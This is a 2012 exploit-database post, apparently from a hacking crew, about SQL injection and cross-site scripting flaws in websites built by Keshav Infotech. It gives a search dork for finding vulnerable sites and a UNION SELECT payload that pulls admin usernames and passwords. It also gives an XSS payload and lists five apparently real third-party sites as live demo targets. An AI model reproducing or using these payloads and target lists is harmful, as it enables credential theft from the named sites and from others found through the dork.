Home / exploitsPDF  

Keshav Infotech Cross Site Scripting / SQL Injection

Posted on 01 November 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ============================================ 1 0 I'm Ur0b0r0x Member From Inj3ct0r TEAM 1 1 ============================================ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | Keshav Infotech - SQL Injection / Cross-Site Scripting Vulnerabilities | -------------------------------------------------------------------------- # Ab0ut M3 #################### # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # InF0 ######################### # Exploit Title: Keshav Infotech - SQL Injection / Cross-Site Scripting Vulnerabilities # Vendor Name: Keshav Infotech # Url Vendor: http://www.keshavinfotech.com/ # Category: WebApps # Type: php # Risk: Critical # Dork: intext:"Design & Developed by: Keshav Infotech" # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase # Expl0it ################### http://site.com/?????.php?id= < Sql Vulnerability Path > http://site.com/?????.php?id= < Xss Vulnerability Path > # Sql_Comand #=> +and+1=2+union+select+1,2,3,unhex(hex(group_concat(password,0x3a,username))),5,6,7,8,9,10,11,12,13,14+from+admin-- # Xss_Comand #=> "><img src=x onerror=alert("1337");> # Dem0_Xss_Sql_Vulnerabilities http://lustdowntown.com/dancer_detail.php?id=%%27 http://www.bestkidsbikes.co.uk/product.php?cid=%%27 https://us-collector.com/news.detail.php?nid=%%27 http://www.bestkidsbikes.co.uk/product_detail.php?id=%%27 http://www.luxlama.se/product.php?id=%%27 # 10'x ######################### >> All Member Inj3ct0r Team >> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker | >> And All H4x0r5

 

TOP